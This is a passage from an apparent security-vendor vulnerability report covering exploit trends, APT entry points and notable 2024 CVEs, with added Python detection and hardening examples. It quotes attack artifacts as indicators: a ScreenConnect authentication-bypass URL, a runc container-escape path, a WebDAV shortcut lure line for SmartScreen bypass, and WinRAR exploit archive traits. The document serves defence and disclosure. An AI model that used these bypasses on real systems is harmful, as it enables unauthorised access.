  157. <div id="attachment_112557" style="width: 972px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06155608/Vulnerability_report_2023__Q1_2024_02.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112557" class="size-full wp-image-112557" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06155608/Vulnerability_report_2023__Q1_2024_02.png" alt="A dark web ad seeking an exploit for the CVE-2023-40477 vulnerability in WinRAR" width="962" height="535" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06155608/Vulnerability_report_2023__Q1_2024_02.png 962w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06155608/Vulnerability_report_2023__Q1_2024_02-300x167.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06155608/Vulnerability_report_2023__Q1_2024_02-768x427.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06155608/Vulnerability_report_2023__Q1_2024_02-270x150.png 270w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06155608/Vulnerability_report_2023__Q1_2024_02-629x350.png 629w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06155608/Vulnerability_report_2023__Q1_2024_02-740x412.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06155608/Vulnerability_report_2023__Q1_2024_02-503x280.png 503w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06155608/Vulnerability_report_2023__Q1_2024_02-800x445.png 800w" sizes="(max-width: 962px) 100vw, 962px" /></a><p id="caption-attachment-112557" class="wp-caption-text">A dark web ad seeking an exploit for the CVE-2023-40477 vulnerability in WinRAR</p></div>
  158. <div id="attachment_112558" style="width: 963px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06155648/Vulnerability_report_2023__Q1_2024_03.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112558" class="size-full wp-image-112558" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06155648/Vulnerability_report_2023__Q1_2024_03.png" alt="A dark web ad seeking assistance in configuring a CVE-2023-28252 exploit for older Windows versions" width="953" height="608" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06155648/Vulnerability_report_2023__Q1_2024_03.png 953w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06155648/Vulnerability_report_2023__Q1_2024_03-300x191.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06155648/Vulnerability_report_2023__Q1_2024_03-768x490.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06155648/Vulnerability_report_2023__Q1_2024_03-549x350.png 549w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06155648/Vulnerability_report_2023__Q1_2024_03-740x472.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06155648/Vulnerability_report_2023__Q1_2024_03-439x280.png 439w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06155648/Vulnerability_report_2023__Q1_2024_03-800x510.png 800w" sizes="(max-width: 953px) 100vw, 953px" /></a><p id="caption-attachment-112558" class="wp-caption-text">A dark web ad seeking assistance in configuring a CVE-2023-28252 exploit for older Windows versions</p></div>
  159. <h3 id="most-prevalent-exploits">Most prevalent exploits</h3>
  160. <p>We continuously monitor exploits published for various vulnerabilities, with a particular focus on critical ones. Our analysis of these exploits has allowed us to single out several categories of software that are of particular interest to malicious actors:</p>
  161. <ul>
  162. <li>Browsers;</li>
  163. <li>Operating systems (Windows, Linux, macOS);</li>
  164. <li>Microsoft Exchange servers and server components;</li>
  165. <li>Microsoft SharePoint servers and server components;</li>
  166. <li>The Microsoft Office suite;</li>
  167. <li>All other applications that fall outside the five categories above.</li>
  168. </ul>
  169. <p>Let&#8217;s see which software categories had the most critical vulnerabilities with working exploits in 2023 and Q1 2024.</p>
  170. <div class="js-infogram-embed" data-id="_/3GTp2brFdNLmDsvrvg0O" data-type="interactive" data-title="07 EN Vulnerability report graphs" style="min-height:;"></div>
  171. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>The distribution of exploits for critical vulnerabilities by platform, 2023 (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07091149/07-en-vulnerability-report-graphs.png" target="_blank" rel="noopener">download</a>)</em></p>
  172. <div class="js-infogram-embed" data-id="_/W4TJxSPFu2utI4NI3xWc" data-type="interactive" data-title="08 EN Vulnerability report graphs" style="min-height:;"></div>
  173. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>The distribution of exploits for critical vulnerabilities by platform, Q1 2024 (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07091036/08-en-vulnerability-report-graphs.png" target="_blank" rel="noopener">download</a>)</em></p>
  174. <p>The data indicates that the software categories most affected by critical vulnerabilities with working exploits are:</p>
  175. <ul>
  176. <li>Operating systems;</li>
  177. <li>Browsers.</li>
  178. </ul>
  179. <p>However, in Q1 2024, we also observed a significant number of exploits targeting Exchange servers. Additionally, a substantial portion of exploits falls into the &#8220;other software&#8221; category. This is due to the variety of applications that users may have installed on their systems to handle business tasks.</p>
  180. <h2 id="vulnerability-exploitation-in-apt-attacks">Vulnerability exploitation in APT attacks</h2>
  181. <p>Exploiting software vulnerabilities is an integral component of nearly every APT attack targeting enterprise infrastructures. We analyzed available data on exploits used in APT attacks for 2023 and Q1 2024 to determine which software is most frequently exploited by attackers. Below are the vulnerabilities that APT groups leveraged the most in 2023 and Q1 2024.</p>
  182. <p><img decoding="async" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07091057/10-en-ru-es-vulnerability-report-graphs.png"></p>
  183. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>The top 10 vulnerabilities exploited in APT attacks, 2023 (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07091057/10-en-ru-es-vulnerability-report-graphs.png" target="_blank" rel="noopener">download</a>)</em></p>
  184. <p><img decoding="async" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07091046/09-en-ru-es-vulnerability-report-graphs.png"></p>
  185. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>The top 10 vulnerabilities exploited in APT attacks, Q1 2024 (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07091046/09-en-ru-es-vulnerability-report-graphs.png" target="_blank" rel="noopener">download</a>)</em></p>
  186. <p>The statistics presented above indicate that popular entry points for malicious actors currently are:</p>
  187. <ul>
  188. <li>Vulnerable remote access services like Ivanti or ScreenConnect.</li>
  189. <li>Vulnerable access control features like Windows SmartScreen.</li>
  190. <li>Vulnerable office applications. Notably, exploits for the Microsoft Office suite, which long held the top of the most-exploited list, were superseded by a WinRAR vulnerability in 2023.</li>
  191. </ul>
  192. <p>Therefore, we can conclude that APT groups mostly exploit vulnerabilities while gaining initial access to an infrastructure. In most cases, this involves either breaching the perimeter (for example, by exploiting vulnerable internet-facing services like VPNs and web applications) or exploiting office applications combined with social engineering (for example, by emailing infected documents or archives to company employees).</p>
  193. <h2 id="notable-q1-2024-vulnerabilities">Notable Q1 2024 vulnerabilities</h2>
  194. <p>This section deals with the most interesting vulnerabilities registered in Q1 2024.</p>
  195. <h3 id="cve-2024-3094-xz">CVE-2024-3094 (XZ)</h3>
  196. <p>A <a href="https://securelist.com/xz-backdoor-story-part-1/112354/" target="_blank" rel="noopener">backdoor</a> was discovered within the XZ data compression utility package in late March. Attackers inserted malicious code into the source code of the library responsible for handling archived data. This code, through a modified build procedure, ended up in the compiled library. Once such a library was loaded, the malicious code began modifying in memory the functions that certain distributions&#8217; SSH server builds rely on, enabling the attackers to send commands to the infected server.</p>
  197. <p>The backdoor&#8217;s functionality is notable because the attackers managed to inject malicious algorithms into a popular library, a feat rarely accomplished in the history of open-source software. The attack also stands out for its complexity and the multi-stage infection process. No one but the author of the malicious code could have exploited the backdoor.</p>
  198. <h3 id="cve-2024-20656-visual-studio">CVE-2024-20656 (Visual Studio)</h3>
  199. <p>This vulnerability in Visual Studio lets a malicious actor elevate their privileges in the system. An attacker can leverage it to execute a DACL reset attack on Windows. A DACL (Discretionary Access Control List) is an access control list that defines the level of access users have to perform specific operations on an object. Resetting a DACL removes all restrictions on accessing system files or directories, so any user can do whatever they wish with them. The vulnerability is intriguing due to its exploitation algorithm.</p>
  200. <p>The exploit source code, which we analyzed, utilizes a method of redirecting the Visual Studio application debugging service from one directory to another through a symlink chain: DummyDir =&gt; Global\\GLOBALROOT\\RPC Control =&gt; TargetDir. Here, DummyDir is a publicly accessible directory created by the attacker, and TargetDir is the directory they want to gain access to. When the application debugging service is redirected from DummyDir to TargetDir, the latter inherits access settings identical to those of DummyDir.</p>
  201. <p>This method of employing symlinks to perform selective actions on protected files is quite challenging to prevent, as not all files within a system can be write-protected. This implies that it could potentially be used to exploit other vulnerabilities in the future. If a file or dependency used by the targeted OS service is identified and its modification restrictions are removed, the user can simply overwrite this file or dependency after the exploit runs. Upon the next launch, the attacker-injected code will execute within the compromised service, inheriting the same access level as the service itself.</p>
  202. <p>We are not currently aware of any cases of this vulnerability being leveraged in real-life attacks. However, it shares the same exploitation primitives with <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-36874" target="_blank" rel="noopener">CVE-2023-36874</a>, which malicious actors began exploiting even before it was discovered.</p>
  203. <h3 id="cve-2024-21626-runc">CVE-2024-21626 (runc)</h3>
  204. <p>OS-level virtualization, or containerization, is widely employed today for application scaling and building fault-tolerant systems. Therefore, vulnerabilities within systems that manage containers are of critical importance.</p>
  205. <p>The vulnerability in question owes its existence to certain behavior of the fork system call in the Linux kernel. This system call&#8217;s characteristic feature is the method by which it launches a child process, which is copied from the parent process.</p>
  206. <p>This functionality allows for rapid application startup but also presents a risk that developers may not always consider. Process cloning implies that some data from the parent process may be accessible from the child process. If the application code fails to monitor such data, this can lead to a data disclosure vulnerability <a href="https://cwe.mitre.org/data/definitions/403.html" target="_blank" rel="noopener">CWE-403</a> – Exposure of File Descriptor to Unintended Control Sphere, according to the <a href="https://cwe.mitre.org/" target="_blank" rel="noopener">CWE category system</a>.</p>
  207. <p>CVE-2024-21626 is a case in point. The Docker toolkit uses the runc tool to create and run containers; therefore, a running container acts as a child process relative to runc. If you try accessing the <em>/proc/self</em> directory from that container, you can obtain descriptors for all files opened by the runc process. Navigation of accessible resources and descriptors in Linux follows file system rules. Hence, attackers quickly started using the relative path to interpreters accessible to the parent process to escape the container.</p>
  208. <p>You can detect exploitation of this vulnerability by monitoring activity within a running container. The primary pattern observed during exploitation involves the container attempting to access the file system using the path:</p>
  209. <p style="text-align: center;font-size: 80%">/proc/self/cwd/../</p>
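<p>The following is an added example, not code from the report: a small Python scanner that applies the indicator above to file-access log lines from container workloads. The log format (timestamp, container ID, process name, accessed path) and the sample lines are constructed and stand in for whatever runtime or audit source you actually collect; the check itself depends only on the path. It also generalizes slightly beyond the literal string on the page by collapsing duplicate slashes and <em>.</em> components before comparing, so cosmetic variants of the same traversal are caught.</p>

```python
import re
from typing import Iterable

# Constructed log format (an assumption, not a real tool's output):
#   "<timestamp> container=<id> comm=<process name> path=<accessed path>"
LOG_LINE = re.compile(
    r"^(?P<ts>\S+) container=(?P<cid>\S+) comm=(?P<comm>\S+) path=(?P<path>\S+)$"
)

# The indicator from the report: a path that walks out of the runc process's
# current working directory, which lives on the host, not in the container.
ESCAPE_PREFIX = "/proc/self/cwd/.."


def normalize(path: str) -> str:
    """Collapse repeated slashes and drop '.' components, but deliberately do NOT
    resolve '..': the traversal components are what the check needs to see."""
    parts = [p for p in path.split("/") if p not in ("", ".")]
    return "/" + "/".join(parts)


def is_escape_attempt(path: str) -> bool:
    """True when the access goes through /proc/self/cwd/.. (any spelling)."""
    norm = normalize(path)
    return norm == ESCAPE_PREFIX or norm.startswith(ESCAPE_PREFIX + "/")


def scan(lines: Iterable[str]) -> list:
    """Return one record per log line whose accessed path matches the indicator."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line.strip())
        if not m:
            continue  # unrelated or malformed line; a real pipeline would count these
        if is_escape_attempt(m["path"]):
            hits.append({"container": m["cid"], "comm": m["comm"], "path": m["path"]})
    return hits


# Constructed sample: two benign accesses and two traversal attempts.
SAMPLE_LOG = """\
2024-03-01T10:00:01Z container=c1a2b3 comm=nginx path=/var/www/index.html
2024-03-01T10:00:02Z container=c1a2b3 comm=sh path=/proc/self/cwd/../../../etc/shadow
2024-03-01T10:00:03Z container=d4e5f6 comm=python path=/proc/self/cwd/./..//bin/bash
2024-03-01T10:00:04Z container=d4e5f6 comm=python path=/proc/self/status
""".splitlines()

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print("container escape indicator:", hit)
```

<p>Reading <em>/proc/self/status</em> or files under <em>/proc/self/cwd</em> without a parent-directory step is not flagged, which keeps the rule quiet for ordinary introspection inside the container.</p>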
  210. <h3 id="cve-2024-1708-screenconnect">CVE-2024-1708 (ScreenConnect)</h3>
  211. <p>ConnectWise ScreenConnect is a remote desktop access tool. It comprises client-side applications running on user systems and a server used for client management. The server hosts a web application that contains the vulnerability in question.</p>
  212. <p>Access control is considered to be the most critical mechanism within web applications. It works only as long as every user-accessible function and parameter in the web application is monitored and validated before being used in the application&#8217;s algorithms. The request monitoring and control in ScreenConnect proved to be inadequate. An attacker could force the system to reset its settings by simply appending a &#8220;/&#8221; character to the original request URL like this: <span style="font-size: 80%">http://vuln.server/SetupWizard.aspx/</span>. As a result, the adversary could gain access to the system with administrator privileges and exploit the server for malicious purposes.</p>
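<p>As an added example (not ScreenConnect&#8217;s code, whose internals the report does not show), the Python below models the class of flaw just described: an access-control guard that compares the request path literally, so a trailing &#8220;/&#8221; reaches the handler unchecked, placed beside a hardened guard that canonicalizes the path first. The page name comes from the report; the guard logic, the treatment of paths beneath the protected page, the server state and the sample access-log lines are assumptions made for the demonstration.</p>

```python
import posixpath
from urllib.parse import unquote, urlsplit

# Page that must be reachable only during initial setup (name from the report).
PROTECTED_PATHS = {"/SetupWizard.aspx"}
# Constructed server state: setup has already been completed.
SETUP_COMPLETE = True


def canonical_path(raw_url: str) -> str:
    """Canonical form for comparison: percent-decoded, '.'/'..' and duplicate
    slashes collapsed, trailing slash removed, lower-cased (ASP.NET routing on
    Windows is case-insensitive)."""
    path = unquote(urlsplit(raw_url).path) or "/"
    return posixpath.normpath(path).lower()


def naive_guard_allows(raw_url: str) -> bool:
    """Vulnerable pattern: literal match. '/SetupWizard.aspx/' is not in the set,
    so the guard lets it through even though the server routes it to the wizard."""
    if SETUP_COMPLETE and urlsplit(raw_url).path in PROTECTED_PATHS:
        return False
    return True


def hardened_guard_allows(raw_url: str) -> bool:
    """Hardened pattern: canonicalize, then deny the protected resource and anything
    routed beneath it (assumed policy: sub-paths of a protected page are protected)."""
    path = canonical_path(raw_url)
    for protected in (p.lower() for p in PROTECTED_PATHS):
        if SETUP_COMPLETE and (path == protected or path.startswith(protected + "/")):
            return False
    return True


def flag_evasive_requests(log_lines) -> list:
    """Detection over access logs: requests whose canonical path is a protected
    resource but whose raw spelling differs, i.e. exactly what the naive guard misses.
    Constructed line format: "<METHOD> <raw path> <status>"."""
    protected = {p.lower() for p in PROTECTED_PATHS}
    flagged = []
    for line in log_lines:
        _method, raw_path, _status = line.split()
        canon = canonical_path(raw_path)
        if canon in protected and unquote(raw_path).lower() != canon:
            flagged.append(raw_path)
    return flagged


# Constructed access-log sample.
SAMPLE_ACCESS_LOG = [
    "GET /Host.aspx 200",
    "GET /SetupWizard.aspx 403",
    "GET /SetupWizard.aspx/ 200",
]

if __name__ == "__main__":
    for url in ("http://vuln.server/SetupWizard.aspx", "http://vuln.server/SetupWizard.aspx/"):
        print(url, "naive:", naive_guard_allows(url), "hardened:", hardened_guard_allows(url))
    print("evasive requests in log:", flag_evasive_requests(SAMPLE_ACCESS_LOG))
```

<p>The detection function is the piece worth keeping after patching: a 200 response to any non-canonical spelling of a setup-only page is a useful hunting signal in web server logs, independent of which product is behind them.</p>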
  213. <p>The vulnerability is being actively used by malicious actors. Therefore, we recommend that ScreenConnect users apply the patch released by the developers and configure firewall rules to restrict access to the server&#8217;s web interface.</p>
  214. <h3 id="cve-2024-21412-windows-defender">CVE-2024-21412 (Windows Defender)</h3>
  215. <p>The primary objective of most attacks targeting user systems is the execution of malicious commands. Attackers aim to accomplish this task through various methods, but the most popular and reliable approach involves launching a malicious file. To minimize the risk of unauthorized application launches, Windows employs a mechanism known as the <a href="https://learn.microsoft.com/en-us/windows/security/operating-system-security/virus-and-threat-protection/microsoft-defender-smartscreen/" target="_blank" rel="noopener">SmartScreen Filter</a>. SmartScreen checks websites that the user visits and files downloaded from the internet. When the check starts, the user sees a lock screen.</p>
  216. <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06160127/Vulnerability_report_2023__Q1_2024_04.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-112559" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06160127/Vulnerability_report_2023__Q1_2024_04.png" alt="" width="666" height="248" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06160127/Vulnerability_report_2023__Q1_2024_04.png 666w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06160127/Vulnerability_report_2023__Q1_2024_04-300x112.png 300w" sizes="(max-width: 666px) 100vw, 666px" /></a></p>
  217. <p>Such a notification can prompt the user to reconsider whether they truly want to launch the application. Consequently, malicious actors are actively seeking ways to bypass this filter. CVE-2024-21412 represents one such method.</p>
  218. <p>Deceiving the security mechanism relies on a simple principle: if SmartScreen checks files downloaded from the internet, just trick the filter into believing that the file was already in the system at the time of launch.</p>
  219. <p style="text-align: center"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06160146/Vulnerability_report_2023__Q1_2024_05.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-112560" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06160146/Vulnerability_report_2023__Q1_2024_05.png" alt="" width="395" height="234" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06160146/Vulnerability_report_2023__Q1_2024_05.png 395w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06160146/Vulnerability_report_2023__Q1_2024_05-300x178.png 300w" sizes="(max-width: 395px) 100vw, 395px" /></a></p>
  220. <p>This can be achieved by interacting with a file stored on network storage. In the vulnerability in question, the storage resides on a WebDAV server. The WebDAV protocol allows multiple users to simultaneously edit a file stored on the server, and Windows provides capabilities for automatic access to such storage. All that remains for attackers is to present the server to the system in the appropriate manner. For this purpose, they use the following file URL:</p><pre class="crayon-plain-tag">URL=file://ip_address@port/webdav/TEST.URL</pre>
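<p>An added example, not from the report or from Microsoft: a gateway-style check for Internet Shortcut (.url) files whose target is a <em>file://</em> URL on a remote host, the shape of the lure shown above. The shortcut texts are constructed (192.0.2.10 is a documentation address), and the interpretation of <em>host@port</em> as Windows WebDAV share syntax is stated as the reason the indicator is checked.</p>

```python
import configparser
from urllib.parse import urlsplit

# Constructed .url file mirroring the report's URL= line.
SAMPLE_SHORTCUT = """\
[InternetShortcut]
URL=file://192.0.2.10@80/webdav/TEST.URL
"""

# Constructed benign cases: an ordinary web link and a local file link.
BENIGN_WEB_SHORTCUT = """\
[InternetShortcut]
URL=https://example.com/
"""

LOCAL_FILE_SHORTCUT = """\
[InternetShortcut]
URL=file:///C:/Users/public/readme.txt
"""


def parse_shortcut_target(text: str) -> str:
    """Return the URL= value from an Internet Shortcut file (INI syntax)."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.read_string(text)
    return cp.get("InternetShortcut", "URL", fallback="")


def classify_shortcut(text: str) -> dict:
    """Flag shortcuts that point at a file:// URL on a remote host.
    A file URL with a non-empty host is a network (UNC/WebDAV) location; Windows
    reads 'host@port' in such a path as a WebDAV share specification."""
    target = parse_shortcut_target(text)
    parts = urlsplit(target)
    remote_file = parts.scheme.lower() == "file" and parts.netloc not in ("", "localhost")
    webdav_style = remote_file and "@" in parts.netloc
    nested = parts.path.lower().endswith(".url")  # shortcut pointing at another shortcut
    return {
        "target": target,
        "remote_file_url": remote_file,
        "webdav_style_host": webdav_style,
        "nested_shortcut": nested,
        "suspicious": remote_file,
    }


if __name__ == "__main__":
    for name, text in (("sample", SAMPLE_SHORTCUT),
                       ("web", BENIGN_WEB_SHORTCUT),
                       ("local", LOCAL_FILE_SHORTCUT)):
        print(name, classify_shortcut(text))
```

<p>A remote <em>file://</em> target alone is enough to quarantine an inbound .url attachment in most environments; the WebDAV-style host and the nested-shortcut flags are reported separately so an analyst can see why a sample was held.</p>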
  221. <h3 id="cve-2024-27198-teamcity">CVE-2024-27198 (TeamCity)</h3>
  222. <p>This vulnerability in the web interface of the TeamCity continuous integration tool allows access to features that should be restricted to authenticated users. You can detect exploitation by analyzing the standard logs that TeamCity generates in its working directory. The malicious pattern appears as follows:</p>
  223. <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06160323/Vulnerability_report_2023__Q1_2024_06.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-112561" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06160323/Vulnerability_report_2023__Q1_2024_06.png" alt="" width="398" height="40" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06160323/Vulnerability_report_2023__Q1_2024_06.png 398w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06160323/Vulnerability_report_2023__Q1_2024_06-300x30.png 300w" sizes="(max-width: 398px) 100vw, 398px" /></a></p>
  224. <p>The improper handling of files with a blank name, as shown above, grants unauthorized attackers access to the server API.</p>
  225. <p>Malicious actors leverage this vulnerability as a way of gaining initial access to targeted systems. For more efficient exploitation monitoring, we recommend auditing accounts with access to the web interface.</p>
  226. <h3 id="cve-2023-38831-winrar">CVE-2023-38831 (WinRAR)</h3>
  227. <p>Although this vulnerability was discovered in 2023, we believe it warrants attention due to its popularity among malicious actors in both late 2023 and Q1 2024.</p>
  228. <p>This is how it works: when attempting to open a file inside an archive using the WinRAR GUI, the application also opens the contents of a folder with the same name if such a folder exists in the archive.</p>
  229. <p>Since attackers began exploiting the vulnerability, they have come up with several types of exploits that can have one of two formats:</p>
  230. <ul>
  231. <li>ZIP archives;</li>
  232. <li>RAR archives.</li>
  233. </ul>
  234. <p>The variations in malware and existing archives make it impossible to determine definitively whether an archive is an exploit. However, we can identify key characteristics of an exploit:</p>
  235. <ul>
  236. <li>The archive contains files whose names match those of subdirectories.</li>
  237. <li>At least one file name contains a space before the extension.</li>
  238. <li>The archive must contain an executable located inside the subdirectory.</li>
  239. </ul>
  240. <p>Here are examples of such files viewed in a hex editor. For a ZIP archive, the data looks like this:</p>
  241. <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06160415/Vulnerability_report_2023__Q1_2024_07.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-112562" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06160415/Vulnerability_report_2023__Q1_2024_07.png" alt="" width="872" height="164" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06160415/Vulnerability_report_2023__Q1_2024_07.png 872w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06160415/Vulnerability_report_2023__Q1_2024_07-300x56.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06160415/Vulnerability_report_2023__Q1_2024_07-768x144.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06160415/Vulnerability_report_2023__Q1_2024_07-740x139.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06160415/Vulnerability_report_2023__Q1_2024_07-800x150.png 800w" sizes="(max-width: 872px) 100vw, 872px" /></a></p>
  242. <p>For RAR files, like this:</p>
  243. <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06160437/Vulnerability_report_2023__Q1_2024_08.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-112563" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06160437/Vulnerability_report_2023__Q1_2024_08.png" alt="" width="861" height="575" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06160437/Vulnerability_report_2023__Q1_2024_08.png 861w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06160437/Vulnerability_report_2023__Q1_2024_08-300x200.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06160437/Vulnerability_report_2023__Q1_2024_08-768x513.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06160437/Vulnerability_report_2023__Q1_2024_08-524x350.png 524w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06160437/Vulnerability_report_2023__Q1_2024_08-740x494.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06160437/Vulnerability_report_2023__Q1_2024_08-419x280.png 419w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06160437/Vulnerability_report_2023__Q1_2024_08-800x534.png 800w" sizes="(max-width: 861px) 100vw, 861px" /></a></p>
  244. <p>Attackers have learned to conceal exploit artifacts by protecting the archive with a password. In such cases, file paths may be encrypted, so the only way to detect an exploit would be through behavior analysis.</p>
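<p>An added example, not code from the report: a Python check that applies the three characteristics listed above to a ZIP archive, the one format of the two that the standard library can read without external tools. It works only while entry names are readable, which is the limitation the preceding paragraph describes. The set of extensions treated as executable is an assumption, and both archives are constructed in memory for the demonstration.</p>

```python
import io
import posixpath
import zipfile

# Assumption: extensions that count as "an executable" for indicator three.
EXECUTABLE_EXTS = {".exe", ".cmd", ".bat", ".com", ".scr", ".ps1", ".vbs", ".js"}


def archive_indicators(data: bytes) -> dict:
    """Evaluate the report's three characteristics against a ZIP's entry names."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = [info.filename for info in zf.infolist()]
    # Explicit directory entries end in "/"; also collect directories implied by file paths.
    dirs = {n.rstrip("/") for n in names if n.endswith("/")}
    files = [n for n in names if not n.endswith("/")]
    for f in files:
        parent = posixpath.dirname(f)
        while parent:
            dirs.add(parent)
            parent = posixpath.dirname(parent)
    top_level_files = [f for f in files if "/" not in f]
    return {
        # 1. a file whose name is identical to a subdirectory's name
        "file_matches_dir": sorted(f for f in top_level_files if f in dirs),
        # 2. a file name with a space immediately before its extension
        "space_before_ext": sorted(f for f in files if " ." in posixpath.basename(f)),
        # 3. an executable located inside a subdirectory
        "exec_in_subdir": sorted(
            f for f in files
            if "/" in f and posixpath.splitext(f)[1].lower() in EXECUTABLE_EXTS
        ),
    }


def looks_like_cve_2023_38831(data: bytes) -> bool:
    """All three indicators present at once."""
    return all(archive_indicators(data).values())


def build_zip(entries: dict) -> bytes:
    """Helper to construct a sample archive in memory."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        for name, content in entries.items():
            zf.writestr(name, content)
    return buf.getvalue()


# Constructed: a decoy document plus a same-named folder holding a script whose
# name carries a space before its extension.
SUSPICIOUS_ZIP = build_zip({
    "report.pdf ": b"%PDF-1.4 constructed decoy",
    "report.pdf /report.pdf .cmd": b"rem constructed placeholder",
})

# Constructed: an ordinary document archive.
BENIGN_ZIP = build_zip({
    "report.pdf": b"%PDF-1.4 constructed document",
    "images/chart.png": b"\x89PNG constructed",
})

if __name__ == "__main__":
    print("suspicious:", looks_like_cve_2023_38831(SUSPICIOUS_ZIP), archive_indicators(SUSPICIOUS_ZIP))
    print("benign:", looks_like_cve_2023_38831(BENIGN_ZIP), archive_indicators(BENIGN_ZIP))
```

<p>Requiring all three indicators together keeps false positives low on legitimate archives that happen to contain a folder named after a file; reporting each indicator separately still lets an analyst triage partial matches.</p>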
  245. <h2 id="conclusions-and-advice">Conclusions and advice</h2>
  246. <p>In recent times, we have observed a continuous year-over-year increase in the number of registered vulnerabilities, accompanied by a rise in the availability of public exploits. Vulnerability exploitation is a crucial component of targeted attacks, with malicious actors typically focused on leveraging vulnerabilities extensively within the first few weeks following their registration and exploit publication. To stay safe, it is essential to respond promptly to the evolving threat landscape. Also, make sure that you:</p>
  247. <ul>
  248. <li>Maintain a comprehensive understanding of your infrastructure and its assets, paying particular attention to the perimeter. Knowledge of your own infrastructure is a fundamental factor in establishing any security processes.</li>
  249. <li>Implement a robust patch management system to promptly identify vulnerable software within your infrastructure and deploy security patches. Our <a href="https://www.kaspersky.com/small-to-medium-business-security/systems-management" target="_blank" rel="noopener">Vulnerability Assessment and Patch Management</a> and <a href="https://www.kaspersky.com/vuln-feed" target="_blank" rel="noopener">Kaspersky Vulnerability Data Feed</a> solutions can assist you in this endeavor.</li>
